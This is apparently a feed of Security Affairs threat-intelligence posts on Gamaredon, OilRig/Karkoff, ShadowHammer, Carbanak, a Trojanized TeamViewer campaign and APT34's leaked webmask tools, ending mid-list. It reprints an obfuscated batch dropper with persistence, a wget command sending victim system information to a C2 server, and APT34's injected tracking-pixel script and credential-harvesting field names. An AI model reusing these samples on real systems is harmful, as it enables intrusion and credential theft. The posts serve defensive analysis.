@echo offset xNBsBXS=%random%*JjuCBOSFor %%q In (wireshark procexp) do (TaskList /FI “ImageName EQ %%q.exe” | Find /I “%%q.exe”)If %ErrorLevel% NEQ 1 goto exitIf SddlzCf==x86 Set WqeZfrx=x64if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOSset “ldoGIUv=%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\”CEFNPKLIf SddlzCf==x86 Set WqeZfrx=x64set “UlHjSKD=%USERPROFILE%”set qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXSset fnQWAZC=winsetupset xNBsBXS=%random%*JjuCBOSset qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXSset “paJvVjr=Document”if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOSset eBqwVLK=%fnQWAZC%.lnkCEFNPKLif SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOSset YFCaOEf=28262set qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXSset vvozoFB=11326set lDwWuLo=26710If SddlzCf==x86 Set WqeZfrx=x64set prJqIBB=dcthfdyjdfcdst,tvset qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXSif SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOStaskkill /f /im %fnQWAZC%.exeCEFNPKLRENAME “%lDwWuLo%” %lDwWuLo%.exeset xNBsBXS=%random%*JjuCBOS%lDwWuLo%.exe “-p%prJqIBB%set qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXScopy /y “%fnQWAZC%” “%UlHjSKD%\%fnQWAZC%.exe”if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOSif exist “%UlHjSKD%\%fnQWAZC%.exe” call :GhlJKaGIf SddlzCf==x86 Set WqeZfrx=x64if not exist “%UlHjSKD%\%fnQWAZC%.exe” call :PEEnqrLset xNBsBXS=%random%*JjuCBOSRENAME “%YFCaOEf%” %eBqwVLK%if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOScopy “%eBqwVLK%” “%ldoGIUv%” /yset qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXSRENAME “%vvozoFB%” “%paJvVjr%.docx”if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOS”%CD%\%paJvVjr%.docx”set xNBsBXS=%random%*JjuCBOSexit /b
:GhlJKaGif SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOSstart “” “%UlHjSKD%\%fnQWAZC%.exe”CEFNPKLexit /b
:PEEnqrLset xNBsBXS=%random%*JjuCBOSRENAME “%fnQWAZC%” %fnQWAZC%.exe::6start “” “%fnQWAZC%.exe”If SddlzCf==x86 Set WqeZfrx=x64exit /b

Firstly, this batch script looks for running Wireshark and Process Explorer programs through the tasklist.exe utility. Then it renames the “11326” file to “Document.docx” and opens it. This is the decoy document seen in Figure 1.

The third step is to extract the contents of the password protected archive named “26710”. The script uses the hard-coded password “dcthfdyjdfcdst,tv” to extract its content, placing it at “%USERPROFILE%\winsetup.exe” and creating an LNK shortcut in the “%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\” directory to ensure its persistence.
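Most of the script above is padding: `if` comparisons between two bare literals that can never be true, assignments to variables that are never expanded, and stray tokens such as CEFNPKL. The Python below is an added example, not part of the Yoroi analysis, that strips those junk lines and expands the surviving variables so the real logic reads as in the paragraphs above; the junk-detection rules are this example's own heuristics, and the input is an excerpt of the Figure 3 script.

```python
"""Strip junk instructions from an obfuscated batch dropper and expand its variables.

Added example, not Yoroi tooling. Heuristics (this example's own): a line is
junk if it is a comment, an 'if A==B' comparing two different bare literals
(never true), a bare token that is not a command, or a 'set' of a variable
that is never expanded anywhere."""
import re
from typing import Dict, List, Set

SET_RE = re.compile(r'^\s*set\s+"?([A-Za-z_][A-Za-z0-9_]*)=(.*?)"?\s*$', re.I)
IF_EQ_RE = re.compile(r'^\s*if\s+(\S+)==(\S+)\s', re.I)
VAR_RE = re.compile(r'%([A-Za-z_][A-Za-z0-9_]*)%')
BARE_COMMANDS = {"exit", "pause", "cls", "echo"}  # one-word lines that are real commands


def is_junk(line: str) -> bool:
    s = line.strip()
    if s.startswith("::") or s.lower().startswith("rem "):
        return True                                   # comment
    m = IF_EQ_RE.match(s)
    if m and "%" not in m.group(1) + m.group(2) and m.group(1) != m.group(2):
        return True                                   # literal != literal: dead branch
    return len(s.split()) == 1 and s.isalnum() and s.lower() not in BARE_COMMANDS


def live_variables(lines: List[str]) -> Set[str]:
    """Names expanded as %NAME% somewhere, following references inside the
    values of live variables. Batch variable names are case-insensitive."""
    values: Dict[str, List[str]] = {}
    live: Set[str] = set()
    for line in lines:
        m = SET_RE.match(line)
        if m:
            values.setdefault(m.group(1).lower(), []).append(m.group(2))
        else:
            live.update(n.lower() for n in VAR_RE.findall(line))
    work = list(live)
    while work:
        for value in values.get(work.pop(), []):
            for ref in VAR_RE.findall(value):
                if ref.lower() not in live:
                    live.add(ref.lower())
                    work.append(ref.lower())
    return live


def expand(text: str, env: Dict[str, str]) -> str:
    """Replace %NAME% with the value assigned so far; unknown names stay as-is."""
    return VAR_RE.sub(lambda m: env.get(m.group(1).lower(), m.group(0)), text)


def deobfuscate(script: str) -> List[str]:
    lines = [l for l in script.splitlines() if l.strip() and not is_junk(l)]
    live = live_variables(lines)
    env: Dict[str, str] = {}
    out: List[str] = []
    for line in lines:
        m = SET_RE.match(line)
        if m:
            name, value = m.group(1), expand(m.group(2), env)
            if name.lower() not in live:
                continue                              # dead assignment, never read
            env[name.lower()] = value
            out.append(f"set {name}={value}")
        else:
            out.append(expand(line, env))
    return out


# Excerpt of the dropper shown in Figure 3 (straight quotes; junk lines kept).
EXCERPT = r'''
@echo off
set xNBsBXS=%random%*JjuCBOS
If %ErrorLevel% NEQ 1 goto exit
If SddlzCf==x86 Set WqeZfrx=x64
set "ldoGIUv=%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\"
CEFNPKL
set "UlHjSKD=%USERPROFILE%"
set qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXS
set fnQWAZC=winsetup
set "paJvVjr=Document"
set eBqwVLK=%fnQWAZC%.lnk
set YFCaOEf=28262
set vvozoFB=11326
if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOS
copy /y "%fnQWAZC%" "%UlHjSKD%\%fnQWAZC%.exe"
RENAME "%YFCaOEf%" %eBqwVLK%
copy "%eBqwVLK%" "%ldoGIUv%" /y
::6
RENAME "%vvozoFB%" "%paJvVjr%.docx"
"%CD%\%paJvVjr%.docx"
exit /b
'''

if __name__ == "__main__":
    print("\n".join(deobfuscate(EXCERPT)))
```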

Sha256: 653a4205fa4bb7c58ef1513cac4172398fd5d65cab78bef7ced2d2e828a1e4b5
Threat: Gamaredon Pteranodon stager (SFX)
Ssdeep: 12288:9pRN/nV+Nn4mNoks/EysKvqjigldJuFjBqg9DmTBs34I8:9pT/nV+N4QokKK7zg9qgQI8

Table 2: Information about SFX stager

This additional file is an SFX archive containing another script and a PE32 binary.

Figure 4: Files contained in SFX archive

The “MicrosoftCreate.exe” file is the UPX-packed version of the “wget” tool compiled for Windows, a free utility for non-interactive HTTP downloads and uploads: a flexible tool commonly used by sys-admins and sometimes abused by threat actors.

The actual malicious logic of the Pteranodon implant is contained within the “30347.cmd” script. Besides junk instructions and obfuscation, the malware gathers information about the compromised machine through the “systeminfo.exe” command. The results are stored in the file “fnQWAZC” and then sent to the command and control server “librework[.ddns[.net”, leveraging the wget utility found previously.

Figure 5: The C2 and obfuscation technique

MicrosoftCreate.exe --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0" --post-data="versiya=arm_02.04&comp=ADMIN-PC&id=ADMIN-PC_del&sysinfo=Nome host:                            ADMIN-PC+###……."

Figure 6: Information about victim machine sent to C2

The malware also schedules the execution of two other actions.

Figure 7: Persistence through task schedule

The first one tries to contact “bitwork[.ddns[.net” to download a “setup.exe” file and store it in the same folder. The other file, “ie_cash.exe”, is stored into the  “%APPDATA%\Roaming\Microsoft\IE\” folder. Despite the different name, it actually is another copy of the wget tool.

Figure 8: Persistence through task schedule (II)

The second scheduled activity runs every 32 minutes and is designed to execute the files downloaded by the previous task. This trick has long been part of the Gamaredon arsenal: in fact, the recovered sample is part of the Pteranodon implant and matches its typical code patterns, showing no relevant edits with respect to previous variants.

In the end, investigating the “librework[.ddns[.net” domain we discovered several other samples connecting to the same C2. All of them appeared in the wild during the first days of April, suggesting the command infrastructure might still be fully functional.

Figure 9: other samples linked to “librework[.ddns[.net” C2 (Source:VT)

Conclusion

The Pteranodon implant seems to have been constantly maintained by the Gamaredon APT group since 2013, a tool the attackers found very effective since they are still using it after such a long time. Apart from this technical consideration, it is quite interesting to notice how strong the Russian interest towards Eastern Europe seems to be, along with the other recent state-sponsored activities possibly aimed at interfering with Ukrainian politics (see “APT28 and Upcoming Elections: evidence of possible interference” and Part II), confirming this cyber-threat is operating on several fronts.

Further details, including Indicators of Compromise and Yara rules, are reported in the analysis published on the Yoroi Blog.  

Pierluigi Paganini

(SecurityAffairs – Ukraine, Gamaredon)

The post The Russian Shadow in Eastern Europe: Gamaredon ‘s Ukrainian MOD Campaign appeared first on Security Affairs.

OilRig APT uses Karkoff malware along with DNSpionage in recent attacks

Iran-linked OilRig cyberespionage group is using the reconnaissance malware Karkoff along with DNSpionage in recent campaigns.

The OilRig APT group, the threat actor behind the DNSpionage malware campaign, is carrying out a new sophisticated and targeted operation that infects victims with a new variant of the dreaded malware.

DNSpionage is a custom RAT that uses HTTP and DNS communication to connect with the C&C server.

Threat actors distributed the malware through compromised websites and weaponized documents.

“In February, we discovered some changes to the actors’ tactics, techniques and procedures (TTPs), including the use of a new reconnaissance phase that selectively chooses which targets to infect with malware.” reads the analysis published by Talos. “In April 2019, we also discovered the actors using a new malware, which we are calling “Karkoff.””


According to the Cisco Talos threat research team, the attackers are leveraging new tactics, techniques, and procedures to improve the efficacy of their operations.

Unlike previous attacks, the group is now using a new malware, tracked as Karkoff, for reconnaissance purposes. Karkoff is used by the hackers to surgically select a target and remain under the radar; it gathers system information about the workstation environment, the operating system, the domain, and the list of running processes on the victims’ machine.

Karkoff is developed in .NET and also allows attackers to remotely execute arbitrary code on compromised hosts.

The experts linked the DNSpionage and Karkoff malware after observing overlaps between their C2 infrastructure.

Experts noticed that the malware searches for two specific anti-virus solutions, Avira and Avast. If one of them is installed on the target system, a specific flag will be set, and some options from the configuration file will be ignored.

Researchers at Talos noticed that the Karkoff malware generates a log file on the compromised machine which records every command it has executed, together with a timestamp.

“From an incident response point of view, it’s interesting to note that the malware generates a log file: C:\\Windows\\Temp\\MSEx_log.txt. The executed commands are stored in this file (xored with ‘M’) with a timestamp.” continues the experts. “This log file can be easily used to create a timeline of the command execution which can be extremely useful when responding to this type of threat. With this in mind, an organisation compromised with this malware would have the opportunity to review the log file and identify the commands carried out against them.”
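Turning that artefact into a timeline is a small job once the XOR is undone. The Python below is an added example, not Talos tooling: only the XOR key ‘M’ and the file path come from the analysis; the record layout (one line per command, ‘YYYY-MM-DD HH:MM:SS’, a tab, the command) and the sample contents are assumptions constructed for this example.

```python
"""Decode a Karkoff-style command log and turn it into a timeline.

Added example, not Talos tooling. From the analysis: the log lives at
C:\\Windows\\Temp\\MSEx_log.txt and the stored commands are XORed with 'M'.
Assumed here: the whole file is XORed, one record per line, laid out as
'YYYY-MM-DD HH:MM:SS<TAB>command'. The sample below is constructed."""
from datetime import datetime
from pathlib import Path
from typing import List, Tuple

XOR_KEY = ord("M")                       # 0x4D, the single-byte key reported by Talos
LOG_PATH = r"C:\Windows\Temp\MSEx_log.txt"
TS_FORMAT = "%Y-%m-%d %H:%M:%S"          # assumed timestamp layout


def xor_m(data: bytes) -> bytes:
    """XOR every byte with 'M'; the same call encodes and decodes."""
    return bytes(b ^ XOR_KEY for b in data)


def parse_records(decoded: bytes) -> List[Tuple[datetime, str]]:
    """Split decoded bytes into (timestamp, command). A line that does not fit
    the assumed layout is kept whole under datetime.min rather than dropped,
    so the responder still sees it."""
    records = []
    for raw in decoded.splitlines():
        line = raw.decode("utf-8", errors="replace").strip()
        if not line:
            continue
        ts_text, _, command = line.partition("\t")
        try:
            records.append((datetime.strptime(ts_text, TS_FORMAT), command))
        except ValueError:
            records.append((datetime.min, line))
    return records


def build_timeline(log_bytes: bytes) -> List[Tuple[datetime, str]]:
    """Decode, parse and order oldest-first: the artefact's main IR value."""
    return sorted(parse_records(xor_m(log_bytes)), key=lambda r: r[0])


def timeline_from_file(path: str = LOG_PATH) -> List[Tuple[datetime, str]]:
    return build_timeline(Path(path).read_bytes())


# Constructed sample: three commands deliberately written out of order, plus one
# malformed line, encoded the way the file on disk would be.
SAMPLE_PLAINTEXT = (
    b"2019-04-02 10:15:07\tsysteminfo\n"
    b"2019-04-02 10:14:55\twhoami\n"
    b"garbage without a timestamp\n"
    b"2019-04-02 10:16:30\ttasklist /v\n"
)
SAMPLE_LOG = xor_m(SAMPLE_PLAINTEXT)

if __name__ == "__main__":
    for ts, cmd in build_timeline(SAMPLE_LOG):
        print(ts.isoformat(sep=" "), cmd)
```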

Attackers behind the DNSpionage campaigns continue to be focused on entities in the Middle Eastern region, including Lebanon and the United Arab Emirates (UAE).

“The threat actor’s ongoing development of DNSpionage malware shows that the attacker continues to find new ways to avoid detection.” “DNS tunneling is a popular method of exfiltration for some actors and recent examples of DNSpionage show that we must ensure DNS is monitored as closely as an organization’s normal proxy or weblogs.” concludes Talos. “The discovery of Karkoff also shows the actor is pivoting and is increasingly attempting to avoid detection while remaining very focused on the Middle Eastern region.”

Pierluigi Paganini

(SecurityAffairs – hacking, DNSpionage)

The post OilRig APT uses Karkoff malware along with DNSpionage in recent attacks appeared first on Security Affairs.

Kaspersky speculates the involvement of ShadowPad attackers in Operation ShadowHammer

Experts at Kaspersky Lab linked the recent supply-chain attack that targeted ASUS users to the “ShadowPad” threat actor and the CCleaner incident.

Security researchers at Kaspersky Lab linked the recent supply-chain attack that hit ASUS users (tracked as Operation ShadowHammer) to the “ShadowPad” threat actor. Experts also linked the incident to the supply chain attack that targeted CCleaner in September 2018. Operation ShadowHammer was uncovered by experts from Kaspersky Lab; the campaign took place between June and November 2018, but experts discovered it only in January 2019. Attackers used a Trojanized version of the ASUS Live Update utility to install a backdoor on specific devices, selected based on their MAC addresses. ASUS has since released software updates to address the issue.

According to Kaspersky, threat actors tampered with a legitimate binary that was initially compiled in 2015 and that was digitally signed to avoid detection.

The malicious code injected in the binaries allows the attackers to fetch and install a backdoor, used in the attack to control the compromised systems.

“It is important to note that any, even tiny, tampering with executables in such a case normally breaks the digital signature. However, in this case, the digital signature was intact: valid and verifiable. We quickly realized that we were dealing with a case of a compromised digital signature.” reads the analysis published by Kaspersky.

“We believe this to be the result of a sophisticated supply chain attack, which matches or even surpasses the ShadowPad and the CCleaner incidents in complexity and techniques. The reason that it stayed undetected for so long is partly the fact that the trojanized software was signed with legitimate certificates (e.g. “ASUSTeK Computer Inc.”).”

The supply chain attack was highly sophisticated and highly targeted: the backdoor was designed to be installed on only 600 select devices, identified through their MAC address.

Some of the MAC addresses targeted by the hackers were rather common, such as 00-50-56-C0-00-08, which belongs to the VMware virtual adapter VMNet8 and is shared by all users of a certain version of the VMware software for Windows.

Another MAC address used in the attack was 0C-5B-8F-27-9A-64, which belongs to a virtual Ethernet adapter designed by Huawei for its USB 3G modem, model E3372h.

During their investigation, experts found other digitally signed binaries from three other vendors in Asia. The binaries are signed with different certificates and a unique chain of trust, but experts pointed out that the way the binaries were trojanized was the same in the three cases.

“The malicious code was not inserted as a resource, neither did it overwrite the unused zero-filled space inside the programs. Instead, it seems to have been neatly compiled into the program, and in most cases, it starts at the beginning of the code section as if it had been added even before the legitimate code.” continues the analysis. “Even the data with the encrypted payload is stored inside this code section. This indicates that the attackers either had access to the source code of the victim’s projects or injected malware on the premises of the breached companies at the time of project compilation.”


Experts found many similarities between non-ASUS-related cases and the ASUS supply chain attack, such as the algorithm used to calculate API function hashes, and the use of IPHLPAPI.dll from within a shellcode embedded into a PE file.

The investigators also found a connection between the ASUS attack and the ShadowPad backdoor, which was first detected in 2017 and attributed to the Axiom group (also known as APT17 or DeputyDog).

The most popular campaign attributed to the APT17 group is the attack on Google’s infrastructure, also known as Operation Aurora. For almost a decade APT17 has targeted government organizations in several Southeast Asian countries and the US, NGOs, defense contractors, law firms, IT firms, and mining companies.

According to malware experts at Intezer, the code used in the CCleaner attack has many similarities with the code used by the Axiom group.

Experts at Kaspersky noticed that the malicious code used in Operation ShadowHammer has reused algorithms from multiple malware samples, including many from the PlugX RAT, a backdoor used by many Chinese-speaking hacker groups.

“ShadowPad, a powerful threat actor, previously concentrated on hitting one company at a time. Current research revealed at least four companies compromised in a similar manner, with three more suspected to have been breached by the same attacker.” Kaspersky concludes. 

“How many more companies are compromised out there is not known. What is known is that ShadowPad succeeded in backdooring developer tools and, one way or another, injected malicious code into digitally signed binaries, subverting trust in this powerful defense mechanism,”

Pierluigi Paganini

(SecurityAffairs – Asus Supply Chain attack, ShadowPad )

The post Kaspersky speculates the involvement of ShadowPad attackers in Operation ShadowHammer appeared first on Security Affairs.

Bodybuilding.com forces password reset after a security breach

Bad news for fitness and bodybuilding enthusiasts: the popular online retailer Bodybuilding.com announced that hackers have broken into its systems.

The popular online retailer website Bodybuilding.com announced last week that hackers have broken into its systems. The website offers all kinds of fitness articles, exercises, workouts, and supplements.

The company confirmed it has no evidence that personal customer information was accessed or misused; as a precautionary measure the company is notifying all current and former users and customers.

“Bodybuilding.com recently became aware of a data security incident that may have affected certain customer information in our possession. We have no evidence that personal information was accessed or misused, but we are directly notifying all current and former users and customers out of an abundance of caution.” reads the announcement published on the website.

“We became aware of a data security incident involving unauthorized access to our systems in February 2019. We engaged one of the leading data security firms to conduct a thorough investigation, which traced the unauthorized activity to a phishing email received in July 2018. On April 12, 2019, we concluded our investigation and could not rule out that personal information may have been accessed.”

The company hired a security firm to investigate the incident, which discovered that the attack began with a phishing email received in July 2018.

The company reported the incident to law enforcement and, with the help of the security firm, is addressing the flaws exploited by the attackers and remediating the incident. The IT staff behind Bodybuilding.com also introduced additional security measures and forced a password reset for its customers.

Data potentially exposed in the incident includes name, Bodybuilding.com usernames and passwords, email address, billing/shipping addresses, phone number, order history, any communications with Bodybuilding.com, birthdate, and any information included in the BodySpace profile.

According to the firm, the potentially accessed data does not include full payment card numbers because the firm does not store them.

“The information potentially accessed in this incident does NOT include full credit or debit card numbers, as we do not store those numbers when customers make purchases in our store.” continues the data breach notification note. “If you’ve opted to store your card in your account, we store only the last four digits of your payment card number for reference and use by you for subsequent purchases, but never the entire card number.”


As usual, Bodybuilding.com users have to change their password on any other account where they used the same credentials as for their Bodybuilding.com account.

Below recommendations provided by the company:

  • Change your password for any other account on which you used the same or similar information used for your Bodybuilding.com account.
  • Review your accounts for suspicious activity.
  • Be cautious of any unsolicited communications that ask for your personal data or refer you to a web page asking for personal data.
  • Avoid clicking on links or downloading attachments from suspicious emails.

Pierluigi Paganini

(SecurityAffairs – fingerprints, Genesis Store)

The post Bodybuilding.com forces password reset after a security breach appeared first on Security Affairs.

G7 Comes Out in Favor of Encryption Backdoors

From a G7 meeting of interior ministers in Paris this month, an "outcome document":

Encourage Internet companies to establish lawful access solutions for their products and services, including data that is encrypted, for law enforcement and competent authorities to access digital evidence, when it is removed or hosted on IT servers located abroad or encrypted, without imposing any particular technology and while ensuring that assistance requested from internet companies is underpinned by the rule of law and due process protection. Some G7 countries highlight the importance of not prohibiting, limiting, or weakening encryption;

There is a weird belief amongst policy makers that hacking an encryption system's key management system is fundamentally different than hacking the system's encryption algorithm. The difference is only technical; the effect is the same. Both are ways of weakening encryption.

FireEye experts found source code for CARBANAK malware on VirusTotal

Cybersecurity researchers from FireEye revealed that the Carbanak source code has been available on VirusTotal for two years, and nobody noticed it before.

Researchers at FireEye discovered that the Carbanak source code has been available on VirusTotal for two years, but it had gone unnoticed.

The Carbanak gang (aka FIN7, Anunak or Cobalt) stole over a billion euros from banks around the world; the name “Carbanak” comes from the malware they used to compromise computers at banks, other financial institutions, restaurants, and companies in other industries.

The CARBANAK cybercrime gang was first uncovered in 2014 by Kaspersky Lab, which dated its activity back to 2013, when the group leveraged the Anunak malware in targeted attacks on financial institutions and ATM networks. Between 2014 and 2016 the group used a new custom malware dubbed Carbanak, which is considered a newer version of Anunak.

Starting in 2016, the group developed new custom malware based on Cobalt Strike, a legitimate penetration testing framework.


The experts discovered the source code, builders, and some previously unknown plugins in two different RAR archives.

The two archives were both uploaded two years ago from the same Russian IP address.

“On the heels of that publication, our colleague Nick Carr uncovered a pair of RAR archives containing CARBANAK source code, builders, and other tools (both available in VirusTotal: kb3r1p and apwmie).” reads a blog post published by FireEye.

“CARBANAK source code was 20MB comprising 755 files, with 39 binaries and 100,000 lines of code. Our goal was to find threat intelligence we missed in our previous analyses.”

Last year, between January and June, law enforcement arrested three Ukrainian suspects: Dmytro Fedorov, Fedir Hladyr, and Andrii Kolpakov.

Fedorov, a skilled hacker suspected of being a manager of the group, was arrested at the request of U.S. officials in Bielsko-Biala, Poland, in January and is currently awaiting extradition to the United States.

In January 2018 foreign authorities also arrested Fedir Hladyr in Dresden, Germany; he is currently detained in Seattle pending trial. Hladyr is suspected of being a system administrator for the group.

In late June 2018, foreign authorities arrested Andrii Kolpakov in Lepe, Spain. The man is suspected of being a supervisor of the group. He is currently detained in Spain pending the United States’ request for extradition.

Pierluigi Paganini

(SecurityAffairs – Carbanak, Russia)

The post FireEye experts found source code for CARBANAK malware on VirusTotal appeared first on Security Affairs.

Targeted Attacks hit multiple embassies with Trojanized TeamViewer

CheckPoint firm uncovered a cyber espionage campaign leveraging a weaponized version of TeamViewer to target officials in several embassies in Europe.

Security experts at CheckPoint uncovered a cyber espionage campaign leveraging a weaponized version of TeamViewer and malware disguised as a top-secret US government document to target officials in several embassies in Europe.

The targeted attacks aimed at embassy officials from at least seven countries (Italy, Kenya, Bermuda, Nepal, Guyana, Lebanon, and Liberia); the individuals hit by the hackers held government revenue-related roles or worked in the financial sector. This aspect suggests a possible financial motivation for the campaign.

The nature of the targets and the multiple-stage nature of the attacks suggest the involvement of a nation state attacker.

According to the experts, the malicious code and the decoy documents were developed by an individual who goes by the handle EvaPiks, which was also for some time the moniker of a user on an illegal Russian carding forum.

“Although in such campaigns it is usually unclear who is behind the attack, in this case we were able to locate a user who appears to be behind the aforementioned activity active in several online forums, or is at least the creator of the tools used in the attack.” reads the analysis published by CheckPoint.

“By following the trail from the previous campaigns we were able to find a `CyberForum[.]ru` user that goes by the name “EvaPiks”. In multiple instances, the user would suggest, or be advised by other users to use, some of the techniques we witnessed throughout the campaigns.”

EvaPiks is suspected to be the developer of the entire infection chain.

The attack chain starts with spear-phishing messages with the subject “Military Financing Program,” carrying an XLSM document with malicious macros.

The decoy document is well crafted: it bears the logo of the US Department of State and is marked as top secret.

“Although the attackers have worked hard to make the document appear convincing, they seem to have overlooked some Cyrillic artifacts (such as the Workbook name) that were left in the document, and could potentially reveal more information about the source of this attack.” continues the analysis.

The macros extract the following files from encoded cells within the XLSM document:

  • a legitimate AutoHotkey (AHK) program;
  • a malicious AHK script that connects to a C2 server to fetch and execute a Trojanized version of TeamViewer, which establishes a backdoor on the infected system.

The malicious TeamViewer build also includes other features, such as hiding the TeamViewer interface, saving the current TeamViewer session credentials to a text file, and allowing the transfer and execution of additional EXE or DLL files.

Experts pointed out that EvaPiks has been involved in previous campaigns where attackers used other weaponized versions of TeamViewer.

One of the variants analyzed by Check Point had the ability to send some basic system information back to the attacker and to delete itself from the infected system. A second variant, observed in 2018, used a new command system and targeted a long list of banks, cryptocurrency exchanges, and e-commerce sites.

The third and current variant implements a DLL execution feature and uses external AutoHotKey scripts to gather information and session credentials.

“On the one hand, from the findings we have described, this appears to be a well thought-out attack that carefully selects a handful of victims and uses tailored decoy content to match the interests of its target audience.

On the other hand, some aspects of this attack were carried out with less caution, and have exposed details that are usually well disguised in similar campaigns, such as the personal information and online history of the perpetrator, as well as the outreach of their malicious activity.” concludes CheckPoint.

“However, the activity history of the developer behind the attack in underground carding forums and the victim’s characteristics may imply that the attacker is financially motivated.”

Further technical details, including IoCs, are reported in the analysis published by the experts.

Pierluigi Paganini

(SecurityAffairs – TeamViewer, hacking)

The post Targeted Attacks hit multiple embassies with Trojanized TeamViewer appeared first on Security Affairs.

Iran-linked APT34: Analyzing the webmask project

Security expert Marco Ramilli published the findings of a quick analysis of the webmask project behind the DNS attacks carried out by APT34 (aka OilRig and HelixKitten).

Thanks to the leaked source code it is now possible to check APT34 implementations and techniques.

Context:

Since at least 2014, an Iranian threat group tracked by FireEye as APT34 has conducted reconnaissance aligned with the strategic interests of Iran. The group conducts operations primarily in the Middle East, targeting financial, government, energy, chemical, telecommunications and other industries. Repeated targeting of Middle Eastern financial, energy and government organisations leads FireEye to assess that those sectors are a primary concern of APT34. The use of infrastructure tied to Iranian operations, timing and alignment with the national interests of Iran also lead FireEye to assess that APT34 acts on behalf of the Iranian government. (Source: MISP Project).

On April 19, 2019, researchers at Chronicle, a security company owned by Google’s parent company Alphabet, examined the leaked tools, which had been dumped the previous week on a Telegram channel, and confirmed that they are indeed the same ones used by the OilRig attackers. OilRig has been connected to a number of intrusions at companies and government agencies across the Middle East and Asia, including technology firms, telecom companies, and even gaming companies. Whoever is leaking the toolset has also been dumping information about the victims OilRig has targeted, as well as data identifying some of the servers the group uses in its attacks.

As reported by Duo, “OilRig delivered Trojans that use DNS tunneling for command and control in attacks since at least May 2016. Since May 2016, the threat group has introduced new tools using different tunneling protocols to their tool set,” Robert Falcone of Palo Alto Networks’ Unit 42 research team wrote in an analysis of the group’s activities.

“Regardless of the tool, all of the DNS tunneling protocols use DNS queries to resolve specially crafted subdomains to transmit data to the C2 and the answers to these queries to receive data from the C2.”

Leaked Source code

The initial leaked source code contains three main folders: webmask, poisonfrog and Webshells_and_Panel. While webmask and poisonfrog seem to be single projects, the Webshells_and_Panel folder looks like it wraps several projects into a single bucket. But, for today, let’s focus on webmask.

WEBMask Focus

The webmask project, in my personal opinion, is an APT34 hallmark, since it implements the core of their DNS attacks. APT34 is well known for making wide use of DNS hijacking in order to redirect victims to attacker-controlled websites. So let’s see what they have implemented so far in this direction.

The webmask project comes with both a guide (guide.txt) and an installation script (install.sh). From the latter we can see the installed NodeJS version, which happens to be 6.x. This version was first released on 2016-04-26 and is still on a development track under the name “Boron”. According to the NodeJS version history, the project cannot be dated before April 2016, since Node.js 6.x did not exist before that date. The guide.txt file suggests two “solutions” (this is the term used); both base their ‘core engine’ on a custom DNS server, used as an authoritative name server to respond with crafted ‘A’ records to specific requests. The attackers suggest using Solution2 (they write “use this” directly in the configuration file), the one that implements the DNS server in NodeJS. Solution1, on the other hand, implements the DNS server in Python. The following image shows the suggested solution.

[Image: APT34: WebMask Project Suggested Solution]

Some domain names and IP addresses are used as configuration examples. Personally, I always find the examples suggested by the attacker interesting, since they carry a distinct flavour of the attacker. In this case the attacker used some target artefacts (IP and DNS) belonging to the ‘Arab Emirates’ net space, while as the responsive artefact (the one used to attack) she used an IP address belonging to a NovinVPS service.

The guide goes on to describe the setup of an ICAP proxy server, used to proxy the victims to the real destination while capturing the entire connection. The attacker suggests Squid3 and guides the operator through installing and configuring it. As ICAP handler she uses a simple Python script placed at icap/icap.py. This script was developed to log and modify the ICAP/connection flow coming from the squid3 proxy. Then the well-known HAProxy is used as a High Availability service to keep connections up, and finally certbot (Let’s Encrypt) is used to give squid3 a valid certificate (but this is neither a mandatory nor a suggested step).

DNS Server scripts

In the dns-redir folder there are 3 files. A configuration file called config.json is used by dnsd.py. The Python script implements a class named MyUDPHandler, which is passed to the native SocketServer.UDPServer and used as the UDP handler. The script overrides DNS A records only when the requested name is included in the overrides object (a variable at the beginning of the source code). In other words, if the DNS request is for an A record and the requested name belongs to a specific domain name, the script responds with the attacker’s IP address. The following image shows the 3 main steps of the override chain.


[Image: DNSD.py: Three steps DNS overriding chain]

According to guide.txt, the suggested solution is not dnsd.py: the attacker prefers the dnsd.js script. This script does not appear to be externally configurable (it does not import config.json), so to configure it you need to edit the script source code manually. The source is written in classic-style ECMAScript, without any of the fancier operators or features introduced in ECMAScript 6 and ECMAScript 7. dnsd.js performs the same tasks as dnsd.py without any notable change.

ICAP script

In the icap folder a Python script called icap.py is placed. This script handles ICAP flows coming from squid3, extracts the desired information and injects tracking pixels. The Python script implements a ThreadingSimpleServer built on SocketServer.ThreadingMixIn, the native framework for multi-threaded network servers. SocketServer.ThreadingMixIn needs a local address and local port to be spawned and a BaseICAPRequestHandler class as second parameter in order to handle ICAP flows. The attacker specialised that class by referring to the general ICAPHandler. The script aims to log the following information into separate files: credentials, cookies, injected files and headers. It silently injects a tracking pixel into communications by adding the following JavaScript to the HTML body.

script = ';$(document).ready(function(){$(\'<img src="file://[ip]/resource/logo.jpg"><img src="http://WPAD/avatar.jpg">\');});'

If the parsed request is an HTTP POST, the ICAPHandler tries to extract credentials through a dedicated function called extract_login_password. The following image shows the process flow of the credential extraction.

[Image: ICAP.py: Credential Extraction Process]

It would be interesting, at least from my point of view, to check the patterns used for login detection. For example, the parsing function looks for the following “form names”:

logins = ['login', 'log-in', 'log_in', 'signin', 'sign-in', 'logon', 'log-on']

It also looks for the following user field names:

userfields = ['log','login', 'wpname', 'ahd_username', 'unickname', 'nickname', 'user', 'user_name','alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname',
